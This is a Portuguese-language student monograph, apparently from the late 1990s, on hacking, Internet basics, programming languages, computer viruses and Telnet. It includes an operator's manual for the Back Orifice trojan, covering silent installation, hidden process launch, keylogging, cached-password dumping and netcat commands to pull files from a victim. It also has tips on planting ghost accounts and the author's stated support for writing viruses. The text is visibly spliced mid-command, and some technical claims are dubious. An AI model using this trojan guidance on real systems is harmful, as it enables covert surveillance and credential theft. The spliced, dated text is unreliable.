INTRODUÇÃO
Através dessa monografia pretendo mostrar as formas de ataque e defesa contra hackers na Internet, os programas mais usados pelos invasores, como eles agem com alguns programas, como conseguem invadir um sistema através dos protocolos de Internet tipo TCP/IP utilizando o Telnet do Windows 9X, invasão via FTP, ataques por Monitoração, criação de conta falsa, escuta pelo celular, formas de correção de problemas que vieram com o IE4 que facilitam a invasão do computador, as linguagens de programação mais usadas na rede(um breve histórico sobre cada uma delas), programas mais utilizados para ataque e defesa na rede (Trojans, Rastreadores, Desencriptadores, Nukes e E-mails Bomba), algumas dicas para quebra de senha da Bios do computador, formas de alterar a cor do MS-DOS 6.xx ou superior, Monitoramento de uma rede, como funciona cada protocolo da Internet, como encher o HD de porcaria, para que serve cada chave do registro do Windows 9x.
Tenho como finalidade não a de ensinar como invadir sistemas e sim mostrar como estão frágeis os micros na Internet e as diversas falhas do Windows que ajudam o Hacker a invadir o seu computador.
COMO SE TORNAR UM HACKER?
Não existe nenhum livro ou material específico em como ser tornar um hacker. Não existe uma fórmula mágica e nem como se tornar um hacker do dia para a noite. Um hacker se faz após anos de muita leitura e estudo. Basicamente toda a informação que você necessita para se tornar um hacker já está disponível na rede, o que você tem que fazer é vasculhar e achar as informações. Está certo que isto não é uma tarefa muito fácil, mas quem disse que ser um hacker é fácil?
Qualquer um pode ser um hacker ou médico ou engenheiro ou etc. Desde que você se informe e estude.
Para você que algum dia pensa em ser um hacker aqui estão algumas dicas no que você deve concentrar seus esforços e começar a aprender.
Conheça a fundo um sistema operacional como o Windows 95, Unix, Windows NT ou MacOS. Com ele é que você ira entender como quebrar a segurança ou então como funciona a segurança, no caso do Windows NT que possui certificado C2 de nível de segurança, é mais difícil, mas não impossível.Aprenda uma linguagem de programação como VisualBasic (específica para a plataforma Intel) ou C (para qualquer plataforma). Você escrevendo pequenos programinhas pode deixar um programa rodando em paralelo para descobrir a senha de acesso.
Aprenda a usar o comando TELNET do Unix para se logar em máquinas remotamente e copiar aquele programa oculto que falta para você entrar no sistema ou então cadastrar um usuário fantasma para entrar no sistema.
Aprenda como funcionam as redes e quais são os tipos de redes existente. Hoje em dia, a maioria dos computadores estão interligados e você conhecendo as arquiteturas e protocolos utilizados facilita bastante o acesso.
Aprenda o protocolo TCP/IP, o protocolo que é usado hoje em dia na Internet. Isto se você quiser ser um hacker da net.
E depois de fazer isso, aconselho que você leia uns bons livros sobre invasão e quebras de senha, que podem ter seus títulos encontrados aqui mesmo na net, e depois disso quem sabe você não seja um verdadeiro hacker!!!
INTERNET
É a rede mundial de computadores, formada por cerca de 100 mil redes menores interligadas por linhas telefônicas. Não pertence a nenhum governo ou empresa. A Internet tem revolucionado a comunicação mundial ao permitir, por exemplo, a conversa entre pessoas a milhares de quilômetros, pelo preço de uma ligação local.
O número tem duplicado a cada ano : 1996 – 50 milhões de usuários. O grande número de usuários é responsável pelo maior problema da Internet : congestionamento e a lentidão no acesso aos serviços.
SURGIMENTO DA INTERNET
A Internet surgiu nos Estados Unidos na década de 60, época da Guerra Fria, como uma rede de informações militares que interliga centros de comandos e de pesquisa, para atender a necessidade militar de proteger os sistemas de defesa do país no caso de um ataque nuclear.
Tendo isso como premissa o Departamento de Defesa dos EUA (DARPA) criou a rede ARPANET que viria a ser a precursora da Internet.
A ARPANET foi idealizada de maneira que garantisse :
Ø a interoperabilidade dos mais variados tipos de computadores
Ø em caso de uma interrupção entre dois computadores o estabelecimento de rotas alternativas
Quanto a interoperabilidade, na década de 70, foi adotado o protocolo TCP/IP pelo DARPA que até hoje é usado como forma de integração entre computadores dos mais diversos fabricantes. Já quanto a questão de uma rede flexível que pudesse escolher rotas alternativas surgiu a tecnologia de redes de pacotes.
DNS
O DNS foi criado para permitir a traduzir o número do IP (representado por quatro grupos de números decimais separados por pontos ex.: 10.250.33.11) por um nome de mais fácil memorização (ex.: telesp.gov.br). Junto com o DNS, foram criados critérios para distinção das atividades das organizações, sendo :
ü com à empresas com fins comerciais
ü gov à empresa do governo
ü net à provedor de meio físico (backbone)
ü edu à instituição educacional (escolas, universidades, etc)
ü mil à orgão militares
ü org à organizações sem fins lucrativos
Endereço da Internet
O e-mail (eletronic mail), é formado por usuário@domínio.com.br, onde :
ü usuário à é o nome de login do usuário ao servidor
ü domínio à é o nome do provedor de acesso do usuário
ü com à entidade comercial
ü br à país onde se localiza o provedor
O endereço de uma página na Internet é formado por :
à http://www.ete.edu.br
onde :
ü http à é o protocolo que permite a transferência de informações na rede e que os autores de páginas de hipertextos incluam comandos que possibilitem saltos para recursos e outros documentos disponíveis em sistemas remoto, de forma transparente para o usuário.
ü www à teia de alcance mundial, baseada em hipertextos, integra diversos serviços Internet que oferecem acesso, através de hiperlinks, a recursos multimídia da Internet; responsável pela popularização da rede, que agora pode ser acessada através de interfaces gráficas.
ü ete à nome de domínio
ü edu à entidade educacional
ü br à país onde se localiza o provedor
HTTP (Hypertext Transfer Protocol)
Protocolo de Transferência de Hipertexto, é o protocolo básico para a comunicação entre computadores que servem páginas WWW. Sem esse protocolo não poderíamos fazer uso dos recursos gráficos na Internet, é ele quem permite a transferência de fotos, gráficos e textos formatados, de uma forma simples e rápida.
WWW (World Wide Web)
Rede de Larga Escala, que foi desenvolvido pelo Conselho Europeu para a Pesquisa Nuclear para ser utilizado em máquinas SUN (Unix). É ele que permite a visualização das páginas como elas são.
LINGUAGENS MAIS USADAS DE PROGRAMAÇÃO
4.1 ASSEMBLER
A primeira razão para se trabalhar com o assembly é a oportunidade de conhecer melhor o funcionamento do seu PC, o que permite o desenvolvimento de programas de forma mais consistente.
A segunda razão é que você pode ter um controle total sobre o PC ao fazer uso do assembly.
Uma outra razão é que programas assembly são mais rápidos, menores e mais poderosos do que os criados com outras linguagens.
Ultimamente, o assembler (montador) permite uma otimização ideal nos programas, seja no seu tamanho ou execução.
4.2 BASIC
O BASIC Beginner's All-Purpose Symbolic Instruction Code surgiu já há algum tempo, foi o pontapé inicial na carreira de Bill Gates, quando largou a faculdade com um amigo para fundar a MICROSOFT e fazer em duas semanas um interpretador para o BASIC, primeiro produto a ser comercializado pela Microsoft. Por esta empreitada conseguiu que a IBM, que estava lançando o seu PC e não esperava tanto sucesso, a permissão para fazer o sistema operacional deste computador, o MS-DOS, que marcou o início do monopólio da Microsoft.
No Brasil, muita gente entrou em contato com ele na década passada com os finados computadores MSX, TK90X, TK2000 e CP500, que o utilizavam como linguagem de programação. Nesta época era comum nos programas o uso descarado e extensivo do comando GOTO, que tornava um programa de algumas dezenas de linhas muito confuso e ilegível.
O BASIC é a linguagem de programação antecessora do Visual Basic, porém, era muito ultilizada antes da era Windows e é uma das linguagens mais fácil de se aprender.
4.3 C/C++
A linguagem C é uma linguagem de alto nível, genérica. Foi desenvolvida POR programadores para programadores tendo como meta características de flexibilidade e portabilidade. O C é uma linguagem que nasceu juntamente com o advento da teoria de linguagem estruturada e do computador pessoal. Assim tornou-se rapidamente uma linguagem "popular" entre os programadores. O C foi usado para desenvolver o sistema operacional UNIX, e hoje esta sendo usada para desenvolver novas linguagens, entre elas a linguagem C++ e Java.
Características do C
Entre as principais características do C, podemos citar:
O C é uma linguagem de alto nível com uma sintaxe bastante estruturada e flexível tornando sua programação bastante simplificada.
Programas em C são compilados, gerando programas executáveis.
O C compartilha recursos tanto de alto quanto de baixo nível, pois permite acesso e programação direta do microprocessador. Com isto, rotinas cuja dependência do tempo é crítica, podem ser facilmente implementadas usando instruções em Assembly. Por esta razão o C é a linguagem preferida dos programadores de aplicativos.
O C é uma linguagem estruturalmente simples e de grande portabilidade. O compilador C gera códigos mais enxutos e velozes do que muitas outras linguagens.
Embora estruturalmente simples (poucas funções intrínsecas) o C não perde funcionalidade pois permite a inclusão de uma farta quantidade de rotinas do usuário. Os fabricantes de compiladores fornecem uma ampla variedade de rotinas pré-compiladas em bibliotecas.
Histórico
1970: Denis Ritchie desenha uma linguagem a partir do BCPL nos laboratórios da Bell Telephones, Inc. Chama a linguagem de B.
1978: Brian Kerningham junta-se a Ritchie para aprimorar a linguagem. A nova versão chama-se C. Pelas suas características de portabilidade e estruturação já se torna popular entre os programadores.
1980: A linguagem é padronizada pelo American National Standard Institute: surge o ANSI C.
1990: A Borland International Co, fabricante de compiladores profissionais escolhe o C e o Pascal como linguagens de trabalho para o seu Integrated Development Enviroment (Ambiente Integrado de Desenvolvimento): surge o Turbo C.
1992: O C se torna ponto de concordância entre teóricos do desenvolvimento da teoria de Object Oriented Programming (programação orientada a objetos): surge o C++.
4.4 CLIPPER
Clipper é uma linguagem de programação desenvolvida em linguagem C para ambiente MS-DOS baseada em Banco de Dados, ou seja, especializada em armazenar dados, ideal para criação de sistemas comerciais, que trabalham com registros de clientes, produtos, afinal, que trabalham com Banco de Dados.
Criada em 1985 pela Nantucket Inc. o Clipper desenvolveu-se muito até hoje, sua primeira versão, chamada de Summer 85 fez tanto sucesso que no mesmo ano a Nantucket lançou a versão Winter 85. Inicialmente o Clipper era muito parecido com o DBASE (Outra linguagem de computador baseada em Banco de Dados, a mais famosa da época) somente diferenciava-se devido a novos comandos introduzidos na versão.
Com o grande sucesso do Clipper, em 1986 foi lançada a Versão Autumn 86, que já diferenciava-se mais do DBASE.
Em 1987 foi lançada a versão Summer 87 que era o Clipper "acabado", com sua estrutura e comandos prontos. E não parou por ai, após tamanho sucesso da versão Summer 87, o Clipper vem lançando novas versões como as versões Clipper 5.0,5.2 Release, etc.
Com as novas tecnologias em Sistemas Operacionais de Hoje, programas de MS-DOS vão desaparecendo lentamente, e consequentemente, as linguagens que os criam, seguem o mesmo caminho. Para que o Clipper não fosse "esquecido" pelo programadores, empresas de diferentes partes do mundo trabalham na versão Visual do Clipper. Hoje em dia já possível encontrar no mercado (ainda que raro) o Visual Clipper para Windows ou até mesmo para UNIX e Linux. É importante lembrarmos que este "novo" Clipper ainda está saindo da fase de estudos, mas que em breve já estará substituindo, lentamente, as antigas versões do Clipper.
Embora tudo isso, o Clipper para MS-DOS ainda é muito eficiente, pois sua capacidade de processar DADOS é muito rápida, facilitando a vida de empresas, lojas, etc.
4.5 COBOL
A palavra COBOL é a abreviação de Commom Busines Oriented Language. Esta é uma linguagem de computador orientada para negócios. As regras que comandam o uso da linguagem a fazem aplicável a problemas comerciais. Criada em 1959, tem passado por grandes e constantes aperfeiçoamentos, inclusive com versões WINDOWS.
Todas as instruções são codificadas em inglês, em vez de códigos complexos. São programas mais extensos, porém mais claros e de mais rápidos entendimento e assimilação, não só da linguagem como dos programas escritos nela.
4.7 HTML
Hyper Text Markup Language, utilizada para elaboração de Home Pages.
A linguagem é escrita em um editor de textos comum, por exemplo, Bloco de Notas, e deve ser gravado com a extensão .HTM.
Esse documento será lido pelo Browser que irá formatá-lo de acordo com os comando utilizados e nos permitirá visualizar um texto com aparência agradável, ouvir sons, assistir a vídeos, entre outros serviços.
COMPILADORES
5.1 DELPHI
O Delphi é um produto único em sua categoria combinando códigos totalmente compiláveis, ferramentas visuais e tecnologia para a composição de bases de dados escaláveis, possui facilidades para um rápido desenvolvimento em plataforma Windows© e aplicações Client/Server.
O Delphi é encontrado em dois produtos:
Delphi Client/Server, de alta performance e facilidade para o desenvolvimento de aplicações e suporte a bancos de dados do tipo Cliente/Servidor.
Delphi Desktop, de alta performance e facilidade para o desenvolvimento de aplicações e suporte a bancos de dados locais, permitindo total portabilidade à versão Client/Server.
5.2 PASCAL
O cientista e professor suíço da Universidade de Zurique, Dr. Nicklaus Wirth, projetou entre 1968 e 1972 a linguagem Pascal para ensinar bons hábitos da programação aos seus alunos. Tal nome foi dado em homenagem ao matemático e inventor francês Blaise Pascal(1623 -1662)
A linguagem Pascal superou as imitações de outras linguagens de programação da época: era uma linguagem estruturada e altamente recomendável para se aprender a arte de programar. Os seus pontos fortes eram a verificação de tipos (fortemente tipada), os comandos para controle de fluxo (estrutrados) e o equilíbrio entre a simplicidade e o poder.
Em 1983 surgiu o Turbo Pascal, a primeira implementação da linguagem Pascal feita pela Borland. Várias versões foram lançadas no mercado e culminaram com a versão orientada a objetos (Object Pascal).
MONITORAMENTO DE UMA REDE
O Back Orifice é um aplicativo cliente/servidor que permite ao cliente monitorar, administrar e realizar outras ações de rede e multimídia na máquina rodando o servidor. Para se comunicar com o servidor, o cliente (modo texto ou gráfico) pode ser executado a partir de qualquer máquina baseada em Microsoft Windows. O servidor atualmente só roda em Windows 95/98.
O pacote bo120.zip contém:
Plugin.txt è A ajuda para programação de plugin.
boserve.exe è O auto-instalador do Back Orifice (BO).
bogui.exe è O cliente modo gráfico (GUI) do Back Orifice.
boclient.exe è O cliente modo texto do Back Orifice.
boconfig.exe è Utilitário de configuração de nome do executável, porta, senha e plugins do servidor BO.
melt.exe è Descompacta arquivos compactados com o comando "freeze".
freeze.exe è Compacta arquivos que podem ser descompactados com o comando "melt".
Para instalar o servidor, é necessário apenas executá-lo. Quando o servidor é executado, ele se instala e se apaga. Uma vez instalado em uma máquina, ele iniciará sempre que a máquina iniciar.
Para atualizar uma cópia do Back Orifice remotamente, faça upload da nova versão do servidor para a máquina remota, e use o comando "Process spawn" para executa- la. Quando executado, o servidor irá automaticamente se instalar no lugar da antiga versão, se apagando após a operação.
Antes da instalação, vários aspectos do servidor podem ser configurados com o utilitário "boconfig": o nome do arquivo em que o Back Orifice se instalará, a porta em que o servidor pode ser acessado e a senha de acesso. Se o servidor não for configurado, ele será acessado na porta 31337, sem senha e se instalando como " .exe" (espaço ponto exe).
O cliente se comunica com o servidor através de pacotes UDP encriptados. Para que se comuniquem, o cliente deve enviar os pacotes para mesma porta que o servidor estiver recebendo, e a senha do cliente deve coincidir com a senha do servidor.
A porta na qual o cliente envia os pacotes pode ser configurada através do parâmetro -p (GUI ou modo texto). Se o acesso estiver sendo filtrado ou um "Firewall" estiver rodando, pode ser necessário enviá-los por uma porta específica, que não esteja sendo filtrada ou bloqueada.
O servidor realiza ações através do envio de comandos do cliente para um endereço IP específico. Se a máquina servidor não estiver sob um endereço estático, ela pode ser localizada utilizando-se os comandos de varredura "sweep" ou "sweeplist" do cliente modo texto, e no GUI através do comando "Ping..." ou entrando-se com um IP na forma "1.2.3.*".
Os comandos atualmente incorporados ao Back Orifice estão listados abaixo. Alguns dos nomes diferem entre o GUI e o modo texto, mas a sintaxe é a mesma para a maioria dos comandos. Mais informações sobre qualquer dos comandos podem ser exibidas através do cliente modo texto digitando-se "help command". O cliente GUI usa os dois campos de parâmetro para descrever as variáveis requeridas por cada comando selecionado da lista "Command". Se parte da informação requerida pelo comando não for fornecida, o erro "Missing data" será enviado pelo servidor.
Os comandos do Back Orifice são:
(gui/comando texto)
App add/appadd è Abre e redireciona um aplicativo modo texto para uma porta tcp. Isso permite que você controle o aplicativo modo texto ou modo dos (como command.com) via telnet.
App del/appdel è Desliga o redirecionamento de um aplicativo.
Apps list/applist è Lista os aplicativos atualmente conectados.
Directory create/md è Cria diretório.
Directory list/dir è Lista arquivos e diretórios. Você deve especificar um curinga caso queira que mais de um arquivo seja listado.
Directory remove/rd è Remove um diretório.
Export add/shareadd è Compartilha um diretório ou drive do servidor em rede. O ícone diretório ou drive compartilhado não é alterado.
Export delete/sharedel è Remove um compartilhamento.
Exports list/sharelist è Lista os compartilhamentos, o drive ou diretório que está sendo compartilhado, os acessos e a senha do compartilhamento.
File copy/copy è Copia um arquivo.
File delete/del è Remove um arquivo.
File find/find è Procura no diretório arquivos que coincidam com a especificação curinga.
File freeze/freeze è Compacta um arquivo.
File melt/melt è Descompacta um arquivo.
File view/view è Visualiza o conteúdo de um documento texto.
HTTP Disable/httpoff è Desabilita o servidor http.
HTTP Enable/httpon è Habilita o servidor http.
Keylog begin/keylog è Registra o texto digitado no servidor em um arquivo texto. O log mostra o nome da janela em que o texto foi digitado.
Keylog end è Interrompe o registro de texto digitado. Para utilizar esse comando no modo texto, use o comando "keylog stop".
MM Capture avi/capavi è Captura vídeo e áudio (se disponível) de um dispositivo de captura de vídeo para um arquivo avi.
MM Capture frame/capframe è Captura um quadro de vídeo de um dispositivo de captura de vídeo para um arquivo bitmap.
MM Capture screen/capscreen è Captura uma imagem da tela do servidor para um arquivo bitmap.
MM List capture devices/listcaps è Lista os dispositivos de captura de vídeo.
MM Play sound/sound è Toca um arquivo Wav no servidor.
Net connections/netlist è Lista as conexões de entrada e saída da rede.
Net delete/netdisconnect è Desconecta o servidor de uma rede.
Net use/netconnect è Conecta o servidor em uma rede.
Net view/netview è Lista todas as interfaces de rede, domínios, servidores e envios do servidor.
Ping host/ping è Testa a conexão com a máquina remota. Informa o nome da máquina e a versão do BO.
Plugin execute/pluginexec è Executa um plugin do Back Orifice. Executar funções não entendidas pelo plugin pode fazer com que o servidor trave.
Plugin kill/pluginkill è Desliga um plugin.
Plugins list/pluginlist è Lista plugins ativos ou avisa de que um plugin foi desligado.
Process kill/prockill è Termina um processo.
Process list/proclist è Lista processos rodando.
Process spawn/procspawn è Abre um programa. Pelo GUI, se o segundo parâmetro é especificado, o processo será executado normalmente e visível. Caso contrário ele será executado de maneira invisível.
Redir add/rediradd è Redireciona recebimento de conexões tcp ou pacotes udp para outro endereço ip.
Redir del/redirdel è Interrompe o redirecionamento de uma porta.
Redir list/redirlist è Lista os redirecionamentos de portas ativos.
Reg create key/regmakekey è Cria uma chave no registro.
NOTA: Para todos os comandos de registro, não especificar a \\ inicial de
valores de registro.
Reg delete key/regdelkey è Remove uma chave no registro.
Reg delete value/regdelval è Remove um valor no registro.
Reg list keys/reglistkeys è Lista as sub-chaves de uma chave de registro.
Reg list values/reglistvals è Lista os valores de uma chave de registro.
Reg set value/regsetval è Define um valor para uma chave de registro. Os valores são especificados no formato tipo vírgula valor. Para valores binários (tipo B) o valor é um série de dois dígitos hexadecimais. Para valores DWORD (tipo D) o valor é um número decimal. Para valores string (tipo S) o valor é uma string de texto.
Resolve host/resolve è Determina o endereço IP de uma máquina em relação à máquina servidor. O nome da máquina pode ser um "host Name" ou o nome de uma máquina em rede local.
System dialogbox/dialog è Cria uma caixa de diálogo no servidor com o texto informado e um botão "o.k.". Você pode criar quantas caixas de diálogo quiser, elas aparecerão em cascata umas sobre as outras.
System Info/Info è Exibe as informações do sistema da máquina servidor. Os dados exibidos incluem nome da máquina, usuário, tipo de cpu, memória total e disponível, dados sobre a versão de Windows e informações sobre os drivers, incluindo tipo (fixo, cd-rom, removível ou remoto) e, nos drivers fixos, o tamanho e espaço disponível do drive.
System lockup/lockup è Trava a máquina servidor.
System passwords/passes è Exibe as senhas cacheadas e a senha do protetor de tela. As senhas podem apresentar caracteres estranhos no fim.
System reboot/reboot è Desliga o servidor e reinicia a máquina.
TCP file receive/tcprecv è Conecta o servidor a um IP e porta específicos e grava qualquer dado recebido por aquela conexão em um arquivo.
TCP file send/tcpsend è Conecta o servidor a um IP e porta específicos, envia o conteúdo do arquivo especificado e o desconecta. Arquivos podem ser transferidos _do_ servidor usando-se o comando "tcp file send" e o utilitário netcat com os parâmetros: netcat-l-p 666 > arquivo
Arquivos podem ser transferidos _para_ o servidor usando-se o comando "tcp file receive" e o utilitário netcat com os parâmetros: netcat-l-p 666 <> Apple II> IBM PC> Macintosh> Amiga
Em agosto de 1989, o número de vírus era praticamente igual entre todas as plataformas, mas hoje em dia existem mais vírus para PC do que antigamente, devido a popularização do mesmo.
O Primeiro vírus para PC foi encontrado em 1986, e foi chamado de Brain. Ele infectava o setor de Boot, se alojava em memória, e depois destruía tudo que encontrava, depois do Brain vieram o Alameda, o Cascade, o Jerusalém, o Lehigh e o Sexta Feira 13. Em 1989 começava a aparecer os primeiros vírus chamados de Stealth e os perigosos Polimórficos.
7.3 OS TIPOS DE VÍRUS
Os vírus não são todos iguais, pode parecer mas não são, com o passar dos anos eles foram evoluindo, sempre com o intuito de dificultar seu rastreamento ou aumentar o poder de destruição. Para acabar com suas duvidas segue abaixo maiores explicações.
7.3.1 OS FALSOS VÍRUS
7.3.1.1 BOMBAS LÓGICAS
São programas que em determinada data ou após certo comando executam operações de cunho destrutivo, formatação por exemplo, ou enviam mensagens de alarme falso para o usuário. Não são considerados vírus porque eles não se reproduzem.
7.3.1.2 CAVALOS-DE-TRÓIA
Muitos comuns na Internet. Os Cavalos-de-tróia são programas que contem algum outro programa maligno. Usualmente, são colocados dentro de outros programas de grande volume de download.
7.3.2 OS VERDADEIROS VÍRUS
7.3.2.1 SETOR DE BOOT OU VÍRUS DE BOOT:
Vírus de Boot são os tipos de vírus mais comuns entre todos os tipos de vírus existentes no mundo. Tudo é preciso para se enfectar com esse tipo, é simplesmente esquecer um disquete contaminado dentro do drive A: Esse disquete não precisa ser do tipo que dá Boot, na verdade quando você ver a mensagem que o disco está sem sistema já é tarde demais, seu micro já está contaminado.
Para contrabalançar, os vírus de BOOT são os mais fáceis de pegar, e eliminar.
Já foram muitos populares, mas, devido à necessidade de estarem localizados sempre no mesmo setor do HD, ficou assim facilitado para que os antivírus os detectassem.
7.3.2.2 STEALTH (VIRUS INVISIVEL):
Mais uma variação sobre o mesmo tema, desta vês os vírus que trazem a característica de "Stealth" tem a capacidade de, entre outras coisas, temporariamente se auto remover da memória, para escapar da ação dos programas antivírus.
Note bem: Os vírus do tipo "Stealth", na verdade, são espécies que se enquadram em um dos tipos acima descritos sendo estes adjetivos utilizados para descrever capacidades adicionadas aos mesmos, para que sejam os mais discretos possíveis, impedindo tanto quanto possível a sua detecção pelos programas antivírus.
São vírus de auto proteção, eles são capazes de fazer uma copia de si mesmos para um outro local do HD após o antivírus o detectar ou seja sempre que um antivírus detectar este vírus ele procura um espaço onde o antivírus já passou e em seguida faz uma copia de si mesmo para lá, legal não acham?
7.3.2.3 MUTANTES OU VÍRUS MULTIPARTITE:
Os vírus desse tipo são, na verdade, uma mistura dos tipos de Boot e de Programas. Eles infectam ambos: arquivos de programas e setores de Boot, o que os tornam muito mais eficazes na tarefa de se espalhar, contaminando outros arquivos e/ou discos , mas também mais difíceis de serem detectados e removidos.
Devido a imensa disputa entre os que escrevem os vírus ,e as empresas que vivem de ganhar dinheiro, muito dinheiro, à caças de suas obras ,cada vez mais têm aparecido vírus que tentam ficar cada vez mais camuflados, de tal sorte a poderem passar despercebidos para os produtos antivírus . Assim aparecem os vírus denominados vírus polimórficos, cuja principal característica é de estarem sempre em mutação.
São aqueles que a cada infecção mudam seu código e criam um novo vírus e/ou uma variação do mesmo. Com essa mudança, tentam enganar os antivírus já que a cada infecção se forma um outro vírus embora executem as mesmas rotinas e funções e causem os mesmos danos.
7.3.2.4 POLIMORFICOS
Uma evolução dos mutantes, mas alem de todas as características dos mutantes também podem alterar o resultado final da infecção, digamos que este tipo é bem menos otário, que os mutantes pois enganam mais os antivírus.
7.3.2.5 ENCRIPTADOS
Um dos tipos mais recentes. Os vírus encriptados por estarem codificados dificultam a ação dos antivírus. Mas são muitos difíceis de se fazer por isso não são muito populares.
7.3.2.6 VÍRUS DE PROGRAMA:
Vírus de programa existem aos milhares, e infectam -normalmente- os arquivos com extensão ,EXE e .COM, alguns contaminam arquivos com extensões ,tais como .OVL e DLL, que na verdade são executáveis mas de um tipo um pouco diferente .
Os mais bem escritos dentre os vírus de programas se replicam, contaminam outros arquivos, de maneira silenciosa, se jamais interferir com a execução dos programa que estão contaminados Assim os usuários não vêm nenhum sinal exterior do que está acontecendo em seu micro.
7.4 CONCLUSÃO
Bem depois de toda esta explicação de vírus acho que a maioria das duvidas forma esclarecidas, vejo também que a produção de vírus nacional é bem baixa sou a favor da criação dos vírus, não porque só servem pra destruir mas sim pra ver o quanto um sistema é seguro, veja meu caso, o natas me pegou de primeira e mesmo assim não fiquei com raiva e sim aprendi que devemos cada vez mais buscar conhecimento dos mesmos.
TUDO QUE VOCÊ PRECISA SABER SOBRE CONEXÕES
8.1 BUG IE 4.0
A Microsoft deu vexame de novo, você sabia que quando você conecta-se a interne com o I.E. 4.0 seu computador esta aberto a qualquer um? Corrija isto já!
Clique em Iniciar, Executar e digite na linha de comando Regedit.exe, então modifique esta chave:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\mkenabled
Altere o valor dela por um valor em branco ou simplesmente coloque o oposto do que está escrito, por exemplo se o valor da chave for “YES” coloque “NO” no lugar mas não esqueça que qualquer valor que for digitado de estar sempre em maiúsculo, se você digitar em minúsculo o Windows não irá reconhecer e dará erro ao iniciar o navegador
8.2 TELNET
TELNET (Protocolo de Terminal Virtual) é o protocolo Internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se executar programas e comandos em outra máquina, como se o teclado de seu computador estivesse ligado diretamente a ela. O visual de uma conexão via Telnet é semelhante ao que se tem em BBS's de interface Dos, e a operação do computador remoto se dá da mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponíveis que sempre se apresenta em algum lugar da tela (esta última forma é a mais comum em servidores que permitem acesso público). O Telnet pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que o computador ao qual você está conectado permitir que você faça. Ele também é muito usado por operadores de sistemas (Sysop's) a fim de fazer algum tipo de manutenção (se você pensa que o Sysop de seu provedor sai de casa toda vez que tem algum problema nos servidores, está muito enganado; muitas vezes ele faz a manutenção de casa mesmo, via Telnet !)
Programas para Telnet Para fazer uma conexão via Telnet, é necessário um programa específico. O Windows 95 já vem com um (procure no diretório c:\windows o programa Telnet.exe - deve estar lá !). Caso seu provedor não lhe forneça um programa para Telnet,
Conectando-se via Telnet Os passos que apresentamos aqui são para o programa que acompanha o Windows 95, mas servem perfeitamente para outros programas, com algumas variações, que você pode perceber e contornar. Se você tem algum dos programas listados ao lado, leia isto primeiro e depois passe para a página específica desse programa. Inicie o programa Telnet.exe ou outro utilitário para esse fim. Clique no menu "Conecta" (connect), selecione "Sistema Remoto" (remote System) e digite na caixa "Nome do Host" (Host Name) o endereço ao qual você quer se conectar (ex.: spacelink.msfc.nasa.gov). Nas caixas "Porta" (port) e "Tipo do Terminal" (terminal type) selecione "telnet" e "vt100", respectivamente (isso não é um padrão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isto, clique no botão "Conectar" (Connect). Isto iniciará a conexão com o computador remoto. Freqüentemente, ao se completar a conexão, o sistema remoto pede uma senha. No nosso exemplo, digite "guest" e aperte enter (lembre-se, você está operando um sistema de interface parecida com o DOS - na verdade é Unix - esqueça o mouse e use o teclado !). Isto abrirá as portas do computador remoto para você. Na tela surge uma série de opções, precedidas de um número ou letra. Para executar um desses comandos, digite esse número ou letra e aperte enter (os usuários da época pré-windows não terão a menor dificuldade com isso). Explore o sistema ao qual você se conectou para exercitar. Quando quiser terminar a conexão, volte ao menu "Conecta" e selecione "Desconectar".
8.3 ALGUNS ENDEREÇOS PARA CONEXÃO
Abaixo temos alguns endereços onde você pode fazer uma conexão via Telnet : netfind.if.usp.br Busca mundial de usuários na Internet. Digite netfind ao estabelecer a conexão. Ned.ipac.caltech.edu Banco de dados Extragalático da NASA/IPAC. Digite ned na conexão. Spacelink.msfc.nasa.gov Banco de dados da NASA. Digite guest ao se conectar. Stis.nsf.gov Informações científicas e tecnológicas. Digite public na conexão. Info: Na seção endereços, existem mais endereços com suas senhas. Espero que, com estas informações, você já seja capaz de fazer uma conexão deste tipo. Alguns endereços não vão Ter nada de interessante, mas não se desanime. Você pode encontrar muito material de pesquisa via Telnet.
Exercício Conecte-se ao Banco de Dados da NASA e copie para seu computador uma foto tirada pelo telescópio Hubble (acredite, vai dar um pouco de trabalho encontrar, mas não desanime; ao final você já vai estar bem mais familiarizado com o Telnet. Comandos básicos de Unix a maioria dos servidores não permite acesso público via Telnet, porque essa é a principal porta de entrada de Hackers. Nestes servidores não se encontra menus que facilitam a navegação pelo site ou operações de qualquer tipo, o que leva a necessidade de se conhecer alguns comandos de Unix. Se você é Webmaster, muitas vezes vai Ter acesso a provedores de presença, via FTP e, em alguns casos, Telnet, para efetuar algumas operações que o FTP não permite. Segue abaixo uma pequena lista de comandos que lhe serão muito úteis neste caso:
ls –l è lista os arquivos de um diretório
ls –al è lista todos os arquivos de um diretório, mesmo os Hidden
cp x y è copia o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro)
mv x y è move o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro)
rm x è deleta o arquivo x
cd xxx è muda o diretório ativo para xxx
cd .. è muda o diretório ativo para o que está ‘acima’ do atual
mkdir xxx è cria o diretório xxx dentro do diretório atual
rm xxx è remove o diretório xxx
Info: Na seção comandos Unix, existem mais comandos.
8.4 PROTOCOLOS
8.4.1 PROTOCOLO TCP/IP (TRANSFER CONTROL PROTOCOL/INTERNET PROTOCOL)
Conjunto de protocolos que torna possível a comunicação de computadores de redes diferentes. É a linguagem universal da Internet.
Para hackear um sistema ligado a Internet/Intranet ou ate mesmo um uma simples rede que utiliza o TCP/IP, nada melhor do que saber lidar a fundo com o protocolo mais usado e mais famoso no mundo inteiro.
TCP/IP é o nome que se da a toda a família de protocolos utilizados pela Internet. Esta família de protocolos foi desenvolvida pela DARPA (Defense Advanced Research Project Agency) no DoD (Departamento de Defesa dos Estados Unidos).
Este conjunto de protocolos foi desenvolvido para permitir aos computadores compartilharem recursos numa rede. Toda a família de protocolos inclui um conjunto de padrões que especificam os detalhes de como comunicar computadores, assim como também convenções para interconectar redes e rotear o tráfego.
Mas ao contrario do que acontece na imprensa, o nome completo raramente é usado. O TCP e o IP são protocolos individuais que podem ser discutidos de modo isolado, mas eles não são os únicos protocolos que compõem essa família. Pode acontecer de um usuário do TCP/IP não utilizar o protocolo TCP propriamente dito, mas sim alguns protocolos da família. A utilização do TCP/IP nessa situação não deixa de ser apropriada porque o nome se aplica de modo genérico ao uso de qualquer protocolo da família TCP/IP.
Alguns Protocolos da família TCP
ARP: (Address Resolution Protocol)
CMP: (Internet Control Message Protocol)
